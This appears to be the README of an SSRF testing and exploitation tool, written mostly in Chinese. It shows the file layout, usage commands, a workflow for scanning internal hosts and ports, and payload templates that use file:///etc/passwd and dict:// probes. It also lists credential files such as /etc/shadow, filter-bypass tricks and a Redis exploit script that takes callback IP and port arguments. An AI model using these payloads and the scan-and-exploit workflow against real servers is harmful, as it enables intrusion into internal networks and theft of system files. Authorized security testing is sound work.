SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
SSRF [+] 服务端请求伪造,当作跳板攻击内网服务 [+] 扫描内部网络、服务 [+] 访问本机敏感文件 [+] 向特定端口发送数据包、payload
.
├── exploit
│ └── redis.py
├── lib
│ ├── check_bypass.py
│ ├── check.py
│ ├── common.py
│ ├── config.py
│ ├── scan.py
│ ├── test
│ └── xmltest.xml
├── plugin
│ └── weblogic.py
├── result
│ ├── 192.168.1.107
│ │ ├── file_content.log
│ │ ├── host_port.log
│ │ └── test.log
│ └── 192.168.1.109
│ ├── file_content.log
│ ├── host_port.log
│ └── test.log
├── ssrfex.py
>> ssrfex.py -u http://192.168.1.107/ssrf.php -d url
流程:
缓存、存活判断--SSRF漏洞路径判断--简单测试--简单规则绕过--子网、端口扫描
| |
| |
file协议利用 端口Exploit利用
例如:
#ssrf_list = [{'server':'weblogic','path':'/uddiexplorer/SearchPublicRegistries.jsp/uddiexplorer/SearchPublicRegistries.jsp'},{'server':'Splash','path':'/render.html'},{'server':'Typecho','path':'/action/xmlrpc'}]
plugin/weblogic.py -u 192.168.1.1 -p 192.168.1
payload_http_inner = "{url}?{query}=http://127.0.0.1".format(url=target,query=parameter)
payload_file = "{url}?{query}=file:///etc/passwd".format(url=target,query=parameter)
payload_dict = "{url}?{query}=dict://127.0.0.1:22".format(url=target,query=parameter)
测试协议,通过响应时间、服务指纹、页面返回内容、静态文件hash值判断
['/etc/rsyslog.conf','/etc/syslog.conf','/etc/passwd','/etc/shadow','/etc/group','/etc/anacrontab','/etc/networks','/etc/hosts']
lib/testxml.xml规则和payload 利用url解析,对ip、host等16进制变换以及添加符号绕过
[22, 80, 445, 3306, 6379, 7001, 8080, 11211]
dict协议,根据服务内容的hash值时间判断
6379 redis
exploit/redis.py -u [host and parameter] -i [redis_ip] -bip [bip] -bport [bport]
- plugin已知SSRF漏洞插件更新:如:Wordpress Discuz Typecho
- SSRF攻击exploit利用:Jobss Mysql struts tomact memcache php-fpm等
- 规则优化
- 302跳转、DNS 利用